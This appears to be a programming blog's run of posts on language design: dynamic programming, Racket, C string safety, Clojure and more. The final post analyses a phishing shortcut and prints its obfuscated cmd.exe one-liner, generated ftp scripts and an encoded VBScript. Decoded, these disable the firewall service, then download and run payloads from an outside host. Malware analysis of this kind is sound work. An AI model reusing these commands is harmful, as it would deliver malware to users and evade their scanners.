The paper also argues that it's difficult for any x86 library to avoid accidentally providing such an interpreter. The architecture goes out of its way to provide convenient instructions for common operations, and to give the common instructions short representations. In particular it provides function return, the crucial operation for this attack, as the convenient one-byte ret instruction. Many other useful instructions are also only one or two bytes, so useful sequences can be quite short. This means they occur not only at intended return sites but as frame shifts inside other instructions, and even in literal constants. So even if a compiler carefully arranged for all return sites to be useless for return-into-libc purposes, the necessary sequences would still appear elsewhere. On x86, it's hard to avoid making the return-into-libc language Turing-complete.

It's not hard to make a Turing-complete language. Many language implementors have done so by accident, when they took languages not intended as programming languages and added convenient features like functions without realizing the implications. Many absurdly simple mathematical systems are also Turing-complete, including ones that don't look like languages, such as Fractran and Rule 110 and Conway's Game of Life. But this is the first case I've heard of where a Turing-complete language exists in the wild, without anyone intending to implement anything like an interpreter at all, as an inevitable consequence of a machine's architecture.

(Via Z-Bo on LtU. This is old news, but I hadn't heard of it, so maybe you haven't either.)

Thou art thyself, though not a Scheme

Is there any part of a language so obviously unimportant as its name? PLT Scheme was recently renamed to Racket, but it's just a name change; the language is the same as before (or at least isn't changing faster than usual). I was rather surprised to hear of this (I fleetingly thought it was April) since the old name is so well known, but apparently the PLTers think their language will be better off if it's not associated with other Schemes. Anyway, the change shouldn't affect anyone who knows, right?

But it does affect me. Yesterday I was lamenting how little of Scheme is portable across implementations, and found myself thinking, “wait, that doesn't apply to PLT Scheme any more, because it's Racket now”. Even though I know there's no difference, I tend to see PLT Scheme as a Scheme with nonportable extensions, and Racket as an independent language. The new name is working: it makes me take Racket more seriously as a platform, not just an implementation.

(However, I keep mistaking it for “Rocket”.)

“Dynamic programming” obscures a simple concept

I'm surprised at how many commenters on my previous post (here and at Reddit and HN) think it's a mistake to identify dynamic programming with memoization. I thought this was uncontroversial: that the central idea of DP is simply to make naive recursive algorithms efficient by memoizing. Evidently a lot of readers think otherwise.

I think they've been misled by the traditional presentation of DP, which bundles a lot of optimizations with that central idea. The recipe usually goes something like this:

  1. Generate a naive recursive algorithm.
  2. Memoize it by saving partial results in an array.
  3. Invert control, so the table of results is explicitly assembled bottom-up instead of as a byproduct of top-down recursion.
  4. Analyze the dependencies among the partial results, and if possible, simplify the saved results to avoid storing unnecessary data.

Notice something wrong here? All the action happens in the first two steps. Well, semantically all the action happens in the first step; even the memoization is only an optimization. But what an optimization! It's what makes impractical algorithms practical; the remaining steps don't change much. The inversion of control usually contributes nothing, so I'm puzzled that some commenters describe it as the distinctive feature of DP; it looks like an artifact of the imperative past to me. Simplifying the results is valuable when it works (it can change the space complexity), but it only applies to some problems; usually it yields little or nothing. Memoization is the important part; the rest is optional.
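For concreteness, here are steps 1 and 2 and nothing else, in Clojure: a naive Fibonacci made practical purely by wrapping it in memoize (my example, not from any particular textbook):

(def fib
  (memoize
   (fn [n]
     (if (< n 2)
       n
       (+ (fib (- n 1)) (fib (- n 2)))))))

(fib 80)   ; returns promptly, because each subproblem is computed only once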

Many programmers learn memoization only as a part of this recipe, and therefore call it by the same name. This is why, when people speak of “a dynamic programming algorithm”, they often mean a memoized one — the process has given its name to its main technique. This isn't very confusing; I wouldn't deprecate this common usage on this account. But I do think it's unfortunate that many programmers know the simple concept of memoization only as part of a larger, less coherent bundle.

What if the concepts were taught in a different order? Imagine you had learned memoization of recursive algorithms as an independent concept, before you had ever heard of dynamic programming. When you later meet the rest of the dynamic programming package — the iterativizing, the compact representations of partial results, the analysis of dependencies — what would you think of it? Would you see it as forming a single coherent idea, or as a collection of optimizations to memoized recursion — potentially useful, sure, but not intrinsic to the concept?

It would be the latter, of course: that's how you understand other complex groups of concepts. Take garbage collection, for example. It can fairly be described as just “finding the live objects by tracing the object graph”. There is much more to it, of course — many algorithms, some of which don't look much like tracing, and many optimizations and implementation tricks. But we don't define garbage collection as necessarily including all of these. We define it by its central concept, and treat the others as optional elaborations on that.

We should treat the concepts of dynamic programming the same way. Rather than try to include them all in one package, and refer to them only as a whole, we should let the central idea stand on its own, without reference to its optimizations. When you make a naive recursive algorithm practical by memoizing it, there's no need to describe the result as a “dynamic programming algorithm”; “memoized” already identifies the technique. Why use the vaguer term when you don't have to?

Some people see DP differently: not as a method of implementing algorithms but as a method of discovering them. To them, it's about analyzing dependencies in recursive algorithms, because this can lead to discovering a simpler or more efficient algorithm. The other concepts, like memoization, are optional. (If I understand correctly, from this point of view memoization is simply the general case of saving results blindly, regardless of how they're used — a useful tool, but not conceptually important.) This is a reasonable concept, but it's not the one I'm talking about; I'm more interested in implementing algorithms than discovering them. Maybe there's a divide here between theorists, who care more about discovery, and practitioners, who care more about handy tools. I'm on the practical side, so I see the algorithm discovery method as less interesting, because it's less often useful, than a simple tool for making naive algorithms efficient.

In an attempt to forestall the most obvious misunderstanding: I do not claim “dynamic programming”, as commonly used, refers only to memoization; it often refers to a recipe which happens to include memoization as its main ingredient. But that main ingredient is much more important than the rest of the recipe. We should give our attention not to the garnishes, but to the simple base on which the rest is optimizations.

Why “dynamic programming”?

I've always hated the term “dynamic programming”. It's big and imposing, making a simple concept sound far more intimidating than it should. And it's completely opaque: if you didn't know the term, would you ever guess that it meant memo functions? (Yes, memoization is the right concept; see the followup.)

I always supposed it was historical, and must have made sense, in some context, at some point. Groping for some way to remember the term, I came up with a fable: if you see the cached results as part of the program, then dynamic programming involves augmenting the program at runtime. So I imagined memoization had initially been seen (or even implemented) as a form of self-modifying code, and that explained the term.

But it turns out it never made even that much sense. Richard Bellman, who coined it, explains:

An interesting question is, ‘Where did the name, dynamic programming, come from?’ The 1950s were not good years for mathematical research. We had a very interesting gentleman in Washington named Wilson. He was Secretary of Defense, and he actually had a pathological fear and hatred of the word, research. I’m not using the term lightly; I’m using it precisely. His face would suffuse, he would turn red, and he would get violent if people used the term, research, in his presence. You can imagine how he felt, then, about the term, mathematical. The RAND Corporation was employed by the Air Force, and the Air Force had Wilson as its boss, essentially. Hence, I felt I had to do something to shield Wilson and the Air Force from the fact that I was really doing mathematics inside the RAND Corporation. What title, what name, could I choose? In the first place I was interested in planning, in decision making, in thinking. But planning, is not a good word for various reasons. I decided therefore to use the word, ‘programming.’ I wanted to get across the idea that this was dynamic, this was multistage, this was time-varying—I thought, let’s kill two birds with one stone. Let’s take a word that has an absolutely precise meaning, namely dynamic, in the classical physical sense. It also has a very interesting property as an adjective, and that is it’s impossible to use the word, dynamic, in a pejorative sense. Try thinking of some combination that will possibly give it a pejorative meaning. It’s impossible. Thus, I thought dynamic programming was a good name. It was something not even a Congressman could object to. So I used it as an umbrella for my activities.

“Dynamic programming” never meant anything; it was nothing but a political euphemism. But somehow it became attached to one of the useful concepts Bellman discovered, and to this day, students of computer science struggle to learn that simple idea, because it's burdened with a nonsense name.

Please call it “memoization” instead. And tell your students.

(Via Wikipedia, of all places. It's not usually a good source for CS information, but it's pretty good about linking to historical sources, or at least, as in this case, to an article quoting one.)

(“Dynamic” does have some negatively connoted uses nowadays, in particular in the static type theory community — partly from the perennial flamewar rivalry with dynamic typing, and partly because the main practical purpose of static analysis is to eliminate dynamic uncertainty, so “dynamic” suggests failure.)

Several people have quoted Russell and Norvig: “This cannot be strictly true, because his first paper using the term (Bellman, 1952) appeared before Wilson became Secretary of Defense in 1953.” Perhaps the antipathy to research did not originate with Wilson, or perhaps Bellman initially intended the term to make sense, and only later adopted it as camouflage.

Some things never change

Mike Taylor is having a bad initial experience with Scheme. In particular:

As I continue to work my way through the exercises (using Scheme itself at least for now), I run into a problem: for exercise 2.9.3 I need set-car!, which the purity-fascist maintainers of PLT Scheme removed in release 4.0. No doubt there is a secret incantation to undo this change, but I can’t immediately see what it is.

As he has already figured out, this is because he's using an R5RS book with an R6RS-ish implementation, and DrScheme's dialect is not a superset of R5RS — not even of the commonly taught parts of R5RS. Such conspicuous backward incompatibilities occasionally strike other languages (Perl, certainly, and hasn't it happened to Python at some point?) but it's more embarrassing in a language like Scheme, which is supposed to be old and elegant and stable.

Correction: as Eli Barzilay points out, it's supposed to be an R6RS book. The use of set-c*r! without the necessary (import (rnrs mutable-pairs)) is probably an oversight, made easy by the fact that it still works in most R6RS implementations. So part of the problem here is that the book is buggy: it uses features that aren't in the language it's teaching. Also, DrScheme's main language isn't R6RS but a different dialect which also happens to lack set-car!.

It's also unfortunate in a language which already has a reputation for being impractical. Mike correctly attributed the problem to “purity-fascist maintainers”, but how many other students, on seeing that Scheme's most popular educational implementation doesn't (by default) support the examples used in popular tutorials, have concluded (or confirmed their prejudice) that Lisp is not useful outside of the ivory tower?

(I don't particularly mind immutable lists, but they're a strange thing to break backward compatibility over.)

Flattening list construction

Most beginning programmers expect lists (and other sequences) to behave something like this:

a = [1, 2, 3]
b = [4]
[a, b] => [1, 2, 3, 4]
[a, 5, b, 6] => [1, 2, 3, 5, 4, 6]

They expect the list construction operator to catenate lists, but not non-lists. As long as lists can't contain other lists (which rarely occurs to beginners), this is a well-behaved operator. Languages which don't allow lists of lists often have it as their default list construction operator: Perl, APL, and R, for example.

Languages which do allow lists of lists generally reject flattening construction on the grounds that it's unpredictable. Which is true — it's easy to write list functions using it that will work perfectly until they encounter nested lists, whereupon they quietly, mysteriously flatten them.

The trouble is, it's a very convenient operator. It's common (especially at the REPL) to construct a list ad hoc, out of some preexisting pieces, and when you do, you generally don't care which elements came prepackaged in lists and which were solitary. That's irrelevant; you just want to assemble them all into a list without worrying about where they came from.

For example, recently I was trying to control the undead menace with Clojure, and wrote this:

(def units (concat (for [y (range 1 20 3)]
                     (spawn zombie 1 y))
                   (list (spawn pixie 10 10)
                         (spawn pixie 15 10))))

I nearly forgot to include that list, because it was irrelevant detail. What I really wanted to write was something like this:

(def units (enlist (for [y (range 1 20 3)]
                     (spawn zombie 1 y))
                   (spawn pixie 10 10)
                   (spawn pixie 15 10)))

In a dynamically typed language, it's easy to define enlist (a sketch follows), but most languages don't provide it, because it can't be made to work consistently for all inputs. I think this is a loss, because it's so very convenient when it does work.
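
A minimal Clojure sketch of one possible definition: splice anything sequential, keep everything else as a single element.

(defn enlist
  "Collect args into one flat seq, splicing in any that are sequential."
  [& args]
  (mapcat #(if (sequential? %) % (list %)) args))

;; (enlist (range 3) 5 [6 7])  => (0 1 2 5 6 7)
;; The inconsistency, as noted above: an element that merely happens
;; to be a list gets spliced whether you meant it to or not.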

Lambda: the discontinuity

I like functional programming, especially in points-free style: it allows amazingly terse expression, with minimal attention to plumbing. But there is an annoyance that often trips me up: there's a discontinuity between combinator expressions and lambda-expressions.

Consider the commonplace task of iterating over a list and, say, printing out the elements. There is an obvious points-free way:

(mapc #'print numbers)

More complex functions can be handled with combinators...

(mapc (compose #'print #'round) numbers)

...and partial application:

(mapc (compose (op format t "  ~S~%" _) #'round) numbers)

But for more complicated functions, points-free style gets awkward quickly, especially if you don't have other combinators like S (the one that lets an argument be used twice). As soon as we want to use some variable twice, it's usually easier to switch to lambda:

(mapc (lambda (x) (format t "~S (really ~S)~%" (round x) x))
      numbers)

And that switch requires rewriting the whole function in a completely different way.

Having more than one way to write functions is not in itself a problem, of course. The trouble is that I often want to transform between them, when a points-free expression grows to the point where it needs a lambda. At this point I have to stop thinking about what I want the code to do, and instead think about the trivia of combinators and variables. It's only a minor annoyance, but it's a very common one. And it's more common in more points-free code, so it probably discourages good programming style.

Is there an alternative to lambda/combinator calculus that can express simple functions as tersely as combinator style, but without the discontinuity when they grow? In particular, I want to be able to name variables without reorganizing the code that uses them. This is a hard problem and I don't expect to find any good solution, but I'm still looking. Lambda and combinator calculus are wonderful things, but they're not perfect, and even a small improvement in expressiveness of simple functions would be a big deal.

C's safety problem

Tim Jasko wrote (over a year ago; sorry):

This got me thinking about how other languages tend to lend themselves to certain vulnerabilities. We're all aware of buffer overflow exploits; these are due almost entirely to the fact that C/C++ force you to waste time managing memory.

Most buffer overflows are due to C, but this isn't because of memory management, except in the very general sense that C doesn't allocate string space automatically. C's vulnerability to buffer overflows is almost entirely due to a peculiar fault of its standard library: many of its string functions do not operate on its standard string type.

C's standard mutable string type is a null-terminated fixed-size buffer. This isn't a great choice, for well-known reasons, but it isn't a vulnerability in itself, and it is at least easy to implement. But surprisingly, C's standard library doesn't. It has a variety of operations that write to string buffers, but many of them expect infinite buffers, so they're unsafe on ordinary C strings. These include strcpy, strcat, sprintf, *scanf with %s, and gets. Sadly, these functions have short names and are considered canonical, so they're used in far more than the rare cases where they're safe.

Furthermore, of the operations that do take a buffer size, several mishandle the overflow case. strncpy omits the null terminator when the source doesn't fit, leaving an invalid string in the buffer (and some snprintf variants, notably Microsoft's _snprintf, do the same); strncat and standard C99 snprintf do terminate, but they truncate silently. Callers are supposed to detect truncation (snprintf at least returns enough information to do so) and then give up or try again with a bigger buffer, but as usual, most callers don't check, so in the overflow case they proceed with an invalid or silently truncated string. So even switching to the length-aware string operations doesn't eliminate buffer overflow problems. (This may contribute to C programmers' tendency to use the unsafe ones.)

Very few C functions are actually designed around writing strings into bounded buffers, always leaving a valid string and making the truncation case natural to handle. In fact, the only one I can think of is fgets.

As Dan Bernstein put it:

I've mostly given up on the standard C library. Many of its facilities, particularly stdio, seem designed to encourage bugs.

Fortunately this problem is unique to C's standard library. There's no reason other languages at the same level of abstraction, or even other C libraries, need to have unsafe string operations. It's easy to write correct string operations, even in C, even for null-terminated strings in fixed-size buffers — and security-conscious C programmers often do. There's no reason but history for any language, even C, to ship a standard library that invites vulnerabilities.

A surprising autoconversion

Autoconversion of types is a handy thing, and easy to miss when you don't have it. This is especially so in languages like C++ that have many static type distinctions, but don't do many of the conversions automatically. C++ has a built-in autoconversion mechanism, but it's too dangerous to use much, and the alternative of manually overloading every operation with type-converting wrappers is too tedious for anything but a few basic types, so in practice C++ is a non-autoconverting language.

That's the standard excuse, anyway. C++ actually does provide quite a lot of autoconversions, but some of them are bizarrely unhelpful. Take the most obvious autoconversion, for example: converting integers to strings. I ran into this one today:

string s;
int n = 40;
s = n;

A naïve (or even not-so-naïve) user might expect this to set s to "40", but it's actually "(". Assigning a single integer to a string is treated as assignment of a single character, not the decimal representation of the integer. But this is only for assignment; the constructor doesn't accept integers at all. I can think of some excuses for this (characters are sometimes (e.g. by getc) represented as ints; string should be consistent with other collections; base 10 is arbitrary; conversions between semantically different types shouldn't happen automatically; STL is supposed to provide a solid foundation, not be easy to use), but user expectation is so strong here that I'm still surprised.

I'm also surprised I've never run into this before. I habitually use printf-like functions for generating strings, but not always, so you'd think I'd encounter this more than once a decade, especially since += has the same surprising overloading. Do I really never generate strings from single integers? Is this most obvious of autoconversions really so rare in practice?

The switch loop as an expressive device

Consider the switch loop. It's a loop which iterates through the branches of a switch statement, so each iteration does something completely different:

for (int step = 0; step < 3; ++step) {
  switch (step) {
    case 0:
      //do one thing
      break;
    case 1:
      //do another thing
      break;
    case 2:
      //do something else
      break;
  }
  //maybe there's a little bit of common code here
}

It looks like blatant stupidity, and sometimes it is. An unreflective coder who hears a problem described in a way that sounds sort of like iteration may implement it as a loop, without considering whether that makes any sense.

Sometimes the same thing happens as an innocent result of maintenance. Maybe the loop did make sense once, before the switch grew to dominate its body, and no one has noticed that it no longer does.

But sometimes the switch loop serves an expressive purpose.

What do you do when a function needs to execute part of itself several times with different parameters? You make a local function, of course. But what do you do in a language like C that doesn't have local functions? Or a language like C++ that has them, but only in the awkward form of local classes?

The switch loop is one solution. It allows its body to be executed repeatedly with different parameters, and it avoids duplicating it or removing it from its local context. Loops are C's only portable way to locally express repeated execution, and the switch loop is a way to use one as the best available approximation to a local function.

It's not a good solution. Even in C, it's generally better to use a separate top-level function, even if it takes a lot of parameters and makes no sense outside the calling context. But to a programmer who is reluctant to create new top-level definitions (a rather common, and annoying, aversion), or who simply overvalues locality of expression, I can imagine the switch loop seeming the best of the bad options.

An Umeshism

Scott Aaronson described Umeshisms: aphorisms of the form “if you never have $problem, you're spending too much effort avoiding $problem”. He asked his readers for more, but despite their computer-scienciness, no one suggested the obvious:

If your programs never have bugs, you're being too careful.

Or, from a language viewpoint:

If your language never has runtime errors, it's rejecting too many correct programs.

There's obviously a mathematical point to this aphorism schema, but it's surprisingly hard to state it explicitly. Try it: you wind up with enough conditions of continuity and monotonicity (and maybe others I missed) to completely obscure the point. That's why we use aphorisms instead.

Belated impressions of Clojure

Clojure is over two years old, and only last week did I finally get round to writing something in it. Some reactions after writing a few hundred lines:

  • Error reporting is often a bane of new languages, but Clojure's is pretty good — usually you get a Java stack trace. However, I did get a number of NullPointerExceptions without stack traces.
  • I often made what must be a standard newbie mistake: using parentheses in place of square brackets. Some forms, like when-first, handle that well:
    user=> (when-first (x nil) 3)
    java.lang.IllegalArgumentException: when-first requires a vector for its
    binding (NO_SOURCE_FILE:0)
    But fn gives a singularly confusing error:
    user=> (fn (x) 2)
    java.lang.RuntimeException: java.lang.IllegalArgumentException: Don't know
    how to create ISeq from: clojure.lang.Symbol (NO_SOURCE_FILE:136)
    This could be easily fixed by checking the type in psig in fn's expander:
    (if (not (vector? params))
      (throw (java.lang.IllegalArgumentException.
              "fn requires a vector for its parameter list")))
  • Accessing nonexistent fields of struct-maps gives nil instead of an exception. This is consistent with other dictionaries, but it means this error isn't detected reliably, even dynamically.
  • doc is the first thing on the cheatsheet, but I didn't notice it until after I'd spent much of a day manually looking things up. :/
  • The documentation for proxy says it “expands to code which creates a instance of a proxy class that implements the named class/interface(s) by calling the supplied fns”, which sounds complicated and potentially inefficient. So I was very suspicious of it until I realized it's just inner classes.
  • Something like half of my total difficulties were about the Java libraries, not Clojure.
  • Java's GUI libraries are not entirely easy to use, but it's still wonderful to be able to take GUI support for granted. I'm used to GUI being possible in theory but not in practice.
  • for, doseq and range did exactly what I wanted, with no mental effort.
  • dosync took some getting used to. ref, deref and alter aren't unfamiliar, but having to announce in advance that you're doing state is a little unnerving. I didn't have any problems with code that might or might not be called in a transaction, but I was afraid I might. I'm not used to keeping track of this.
  • The inability to nest #(... % ...) is annoying. In about 200 nonblank noncomment lines, I used it five times. It would have been seven, but two of those would have been nested (immediately, in both cases) inside others. On the other hand, there were several other 1-argument fns that could have been written with #(... % ...), had I thought of it — which I didn't, because my pet language's equivalent only does partial application.
  • (alter r f x) is equivalent to (alter r #(f % x)). This saves a little typing, but it's such an arbitrary convenience that I found myself worrying about whether it worked with each function's argument order.
  • Clojure structures are dictionaries, but this isn't important; so far I've only used them like ordinary user-defined classes whose accessors happen to have names beginning with colons. It does mean they appear in a strange place in the documentation, though.
  • assoc is obvious in retrospect. I have wanted such an operator for structures, and I'd probably want it for dictionaries too, if I ever used nondestructive dictionaries.
  • Some functions I missed: abs, expt, union and intersection (they exist in clojure.set but not in the default namespace, and they don't work on lists), member? (on values, not keys), for-each (yeah, I know, I'm not supposed to want it), and a function that returns the first element of a list that satisfies a predicate. (Most of these are easy to approximate; see the sketch after this list.)
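
A few possible stand-ins for the ones I missed most, as a sketch rather than a library (the names are mine; the set functions already exist, just not on lists or in the default namespace):

(require '[clojure.set :as set])

(defn abs [x] (if (neg? x) (- x) x))

(defn expt
  "b raised to a nonnegative integer power e."
  [b e]
  (reduce * (repeat e b)))

(defn member?
  "Does coll contain the value x?"
  [x coll]
  (boolean (some #(= % x) coll)))

(defn find-first
  "The first element of coll that satisfies pred, or nil."
  [pred coll]
  (first (filter pred coll)))

(set/union (set '(1 2)) (set '(2 3)))   ; => #{1 2 3}
(find-first even? '(1 3 4 5))           ; => 4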

Function of the day: scalar resolute

The language of mathematics is old and heavily explored, so its vocabulary tends to align well with what is asked of it. But occasional holes do turn up when parts of it are borrowed into programming languages and used for purposes different from those they were developed for. I ran into one of these twice recently, for unrelated reasons, while writing vector arithmetic code. In both cases, I had vectors a and b, and needed the component of a in the direction of b — the projection of a on b, except that I needed it as a scalar. My vector library provided norm, project, unit and dot, so I had a choice of norm (project a b) or dot a (unit b), neither of which is particularly clear.

A little googling reveals that while this operation isn't commonly taught, it is known to mathematicians, who call it the scalar resolute, by analogy to “vector resolute”, which is another name for the ordinary projection operation. It seems to me that I want it considerably more often than either project or dot, so it makes sense to include it in vector libraries. Unfortunately it has no common notation, and while one could be invented (scalar-project? along?), the operation is obscure enough that its would-be users might not recognize it by any name, because they wouldn't be looking for it.

Many uses of scalar resolute also want the component perpendicular to the base vector, i.e. norm (a - (project a b)), because they're really about converting from one coordinate system to another. A vector library could directly support this with a rotate or rebase function. However, a glance through my code suggests this wouldn't be very useful, because the point of the transformation is to obtain the individual components, so they can be operated on as scalars. Producing another vector as an intermediate step would not greatly help clarity. So I think these are most convenient as separate functions:

along : (vector, vector) → scalar
along v b = norm (project v b)

across : (vector, vector) → scalar
across v b = norm (v - project v b)
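
In Clojure, with vectors as plain seqs of numbers, a sketch might look like this. It uses the signed form dot v (unit b), which agrees with norm (project v b) except that it keeps the sign when v points away from b:

(defn dot  [a b] (reduce + (map * a b)))
(defn norm [a]   (Math/sqrt (dot a a)))

(defn along
  "Scalar component of v in the direction of b (the scalar resolute)."
  [v b]
  (/ (dot v b) (norm b)))

(defn across
  "Magnitude of the component of v perpendicular to b."
  [v b]
  (let [a (along v b)]
    (Math/sqrt (max 0.0 (- (dot v v) (* a a))))))

;; (along [3 4] [1 0]) => 3.0,  (across [3 4] [1 0]) => 4.0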

Rational arithmetic is a red herring

It's a traditional question: what's 1 / 3?

Depending on the language, the result may be the integer 0, a floating-point approximation 0.33333333333..., or the exact ratio 1/3. Languages supporting the last often tout it as one of their advantages: they give correct results for integer division, unlike those other languages that only give almost-correct ones, or, worse, compute some other function entirely and call it division.

I used to agree with this. Exact arithmetic is a nice feature, to be sure, and I've happily used it in a few toy programs. But as far as I can remember, I've never wanted it in a real program. Somehow, whenever I need real arithmetic for a real problem, some of the input is already approximate, so I don't mind a little more rounding. Rational arithmetic looks nice on a feature checklist, but it rarely makes my life easier.

It's also not as special as it sounds. Ratios are a simple case of symbolic arithmetic: keeping the result as something expression-like, instead of approximating it by a mere number. But division isn't the only operation that's commonly available only in approximate form. We don't expect square roots or trigonometry to be done symbolically; usually we settle for numerical approximations. Why should division be different?

While I'm complaining about rationals, I should mention a common practical problem: most languages with rationals print them as ratios, which can be quite inconvenient for humans to read. It's annoying to use a language's REPL as a calculator, and to discover that you have accidentally gotten an exact result, and must introduce some inexactness into the computation in order to be able to understand the result. (Frink can handle this nicely, by printing both the ratio and decimal forms, although for some reason this no longer works in the convenient online version.) This is a superficial UI problem, and really has nothing to do with rational arithmetic, but if it's not addressed — and it rarely is — it interferes with the utility of the language far more than mere rounding.
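
Clojure makes a convenient illustration: integer division yields an exact ratio, printed as a ratio, and you only get a readable decimal by asking for one (or by letting some inexact input contaminate the result):

user=> (/ 1 3)
1/3
user=> (double (/ 1 3))
0.3333333333333333
user=> (+ (/ 1 3) 0.25)
0.5833333333333333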

An onion of obfuscation

I received a phishing attack in my mail today. I wouldn't ordinarily have paid any attention, especially as it was attached to a message in Chinese, which I can't read without a dictionary and a grammar book (and not well then). But by chance it appeared to come from someone who has previously written to me in Chinese, and it was short enough that she might plausibly have intended me to puzzle it out. So the unintelligible message raised my suspicions only a little, and I looked at the attachment anyway. (Sure enough, the message turned out to be vague platitudes.)

It took a while for me to figure out that it was a phishing attack, not a virus. It was packaged as a Windows .LNK file — a shortcut — which ran a 245-character command beginning with:

%coMSpEc% /C sET s=o GAm &ECHO %V%%S%E0TW%x%^>K>w&eCHO %v%123^>^>K>>w& ...

Sorry about the StUdLyCaPs — it was apparently written like that to make it look less like code. But what does it do? %comspec% is usually cmd.exe, and cmd /c some-command runs some-command. In cmd.exe's language, & separates multiple commands to be run sequentially. So this is a script embedded in a one-line command. Case-folded and reformatted, it's:

set s=o gam
echo %v%%s%e0tw%x%^>k >w
echo %v%123^>^>k >>w
echo %v%123^>^>k >>w
echo %v%get c c.vbs ^>^>k >>w
echo %v%by ^>^>k >>w
echo %i%p%b%s:k >>w
echo %f%art c.vbs >>w
set b= -
set i=ft
set x=.com
set v=echo 
ren w g.bat
set f=st
g.bat

This writes something to w and then executes it. ^ escapes the following character, and > and >> are the same as on Unix, so the contents of w turn out to be:

%v%o game0tw%x% >k
%v%123 >>k
%v%123 >>k
%v%get c c.vbs >>k
%v%by >>k
%i%p%b%s:k
%f%art c.vbs

Substituting in the variables gives:

echo o game0tw.com >k
echo 123 >>k
echo 123 >>k
echo get c c.vbs >>k
echo by >>k
ftp -s:k
start c.vbs

So it's writing another file and executing it, although in this case the interpreter is ftp. k contains:

o game0tw.com
123
123
get c c.vbs
by

The 123s are a username and password, which ftp will prompt for. c.vbs is (as of two hours later) still available; it contains (reformatted):

function o
  for i=1 to UBound(s)
    h=h&chr(s(i)-232)
  next
  Set qq = CreateObject("Wscript.Shell") 
  qq.run h,0
end function
s=array(245,331,341,332,264,279,331,264,342,333,348,264,347,
        348,343,344,264,347,336,329,346,333,332,329,331,331,
        333,347,347,270,333,331,336,343,264,343,264,335,329,
        341,333,280,348,351,278,331,343,341,294,341,278,348,
        352,348,270,333,331,336,343,264,281,282,283,294,294,
        341,278,348,352,348,270,333,331,336,343,264,281,282,
        283,294,294,341,278,348,352,348,270,333,331,336,343,
        341,278,348,352,348,270,333,331,336,343,264,330,353,
        333,294,294,341,278,348,352,348,270,334,348,344,264,
        277,347,290,341,278,348,352,348,270,332,333,340,264,
        341,278,348,352,348,270,333,278,333,352,333,270,329,
        348,348,346,337,330,264,295,278,350,330,347,264,277,
        346,270,332,333,340,264,295,264,295,278,330,329,348,
        264,295,278,350,330,347,264,295,278,333,352,333,270,
        270,347,348,329,346,348,264,336,348,348,344,290,279,
        279,348,351,278,330,337,332,278,353,329,336,343,343,
        278,331,343,341,279)
o
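
The o function is just an offset cipher: skip element 0, subtract 232 from each number, and read the results as character codes. For anyone following along, the same decoding in Clojure (with s standing for the array above) is a one-liner:

(defn decode [s]
  (apply str (map #(char (- % 232)) (rest s))))

;; The decoded string begins
;; "cmd /c net stop sharedaccess&echo o game0tw.com>m.txt&..."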

Once the array is converted to a string, h turns out to be another script embedded in a cmd /c one-liner. This time the commands are:

net stop sharedaccess
echo o game0tw.com >m.txt
echo 123 >>m.txt
echo 123 >>m.txt
echo get e e.exe >>m.txt
echo bye >>m.txt
ftp -s:m.txt
del m.txt
e.exe
attrib ?.vbs -r
del ? ?.bat ?.vbs ?.exe
start http://tw.bid.yahoo.com/

Looks familiar, no? Once again it writes a script for ftp and fetches and runs a file. Despite being transferred in text mode, e.exe turns out to be a 52736-byte executable. I won't try to understand it, but I think it's the payload rather than another level of obfuscatory packaging, because it imports a variety of suspicious Win32 functions, including DeviceIoControl, InsertMenuA, and UnregisterClassW. I'm guessing it tries to replace something (part of a browser?) for phishing purposes. There is a suspicious shortage of strings other than the imports, though, which suggests it obfuscates its data internally. (It also calls IsDebuggerPresent, presumably to inconvenience people who are trying to watch it run.)

But never mind the binary. Count the layers of obfuscatory packaging:

  • Embedding a script in a command via cmd /C ... & ... & ... (twice)
  • StUdLyCaPs to escape case-sensitive code detectors
  • Assembling strings out of several pieces
  • Generating a script and then running it (four times)
  • Representing text as an array of numbers
  • Fetching code from elsewhere (twice)
  • Fetching a binary in text mode, so ordinary attempts to download it will get a corrupted version.

That's some impressive depth of defense. I'm tempted to dismiss it as a waste of effort, since none of the layers are much trouble by themselves. But it did get past my virus scanner.